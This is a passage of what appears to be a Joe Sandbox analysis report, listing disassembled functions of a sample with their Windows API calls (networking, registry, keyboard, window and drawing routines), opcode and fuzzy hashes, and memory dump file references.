                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                    • API String ID: 3207048006-625585964
                                                                                                                                                    • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                                                    • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                                                                    • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                                                    • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                                                                    Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                                                    • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                                                                    • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                                                                    • _memmove.LIBCMT ref: 004656CA
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                                                                    • WSACleanup.WSOCK32 ref: 00465762
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2945290962-0
                                                                                                                                                    • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                                    • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                                                                    • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                                    • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                                                                    Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                                                                    • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                                                                    • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1457242333-0
                                                                                                                                                    • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                                                    • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                                                                    • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                                                    • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                                                                    Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 15295421-0
                                                                                                                                                    • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                                                    • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                                                                    • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                                                    • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                                                                    Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                    • _wcstok.LIBCMT ref: 004675B2
                                                                                                                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                                                    • _wcscpy.LIBCMT ref: 00467641
                                                                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                                                    • _wcslen.LIBCMT ref: 00467793
                                                                                                                                                    • _wcslen.LIBCMT ref: 004677BD
                                                                                                                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                                                                                    • String ID: X
                                                                                                                                                    • API String ID: 780548581-3081909835
                                                                                                                                                    • Opcode ID: 989213032f2781f773275e9d60e2622f0adca77e0f7d5505091de7ce585853a2
                                                                                                                                                    • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                                                                                    • Opcode Fuzzy Hash: 989213032f2781f773275e9d60e2622f0adca77e0f7d5505091de7ce585853a2
                                                                                                                                                    • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                                                                                    Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                    • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                                                                    • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                                                                    • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                                                                    • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                                                                    • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                                                                    • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                                                                    • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4082120231-0
                                                                                                                                                    • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                                                    • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                                                                    • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                                                    • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                                                                    Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2027346449-0
                                                                                                                                                    • Opcode ID: 7cdefffd16f9e0be9b38984aa58d14b591901f04b3f33eeccf5bf40e87674113
                                                                                                                                                    • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                                                                    • Opcode Fuzzy Hash: 7cdefffd16f9e0be9b38984aa58d14b591901f04b3f33eeccf5bf40e87674113
                                                                                                                                                    • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                                                                    Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                    • GetMenu.USER32 ref: 0047A703
                                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                                                                    • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                                                                    • _wcslen.LIBCMT ref: 0047A79E
                                                                                                                                                    • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                                                                    • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3257027151-0
                                                                                                                                                    • Opcode ID: fb13d82cc146d1e758beec8d4391eb4325a70a0a41cf77ad705cb1ebe11bd533
                                                                                                                                                    • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                                                                    • Opcode Fuzzy Hash: fb13d82cc146d1e758beec8d4391eb4325a70a0a41cf77ad705cb1ebe11bd533
                                                                                                                                                    • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                                                                    Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastselect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 215497628-0
                                                                                                                                                    • Opcode ID: 8aa2eb3f3df720354a9e9a8f9290abb7d1a11705e6024be9ce6568ed17a5f946
                                                                                                                                                    • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                                                                                    • Opcode Fuzzy Hash: 8aa2eb3f3df720354a9e9a8f9290abb7d1a11705e6024be9ce6568ed17a5f946
                                                                                                                                                    • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                                                                                    Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32(?), ref: 0044443B
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                    • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                                                    • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                                                                                    • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                                                    • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                                                                                    Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32(?), ref: 00444633
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00444648
                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                                                                                    • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                    • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                                                    • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                                                                                    • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                                                    • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                                                                                    Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                                                                                    • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                                                                                    • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
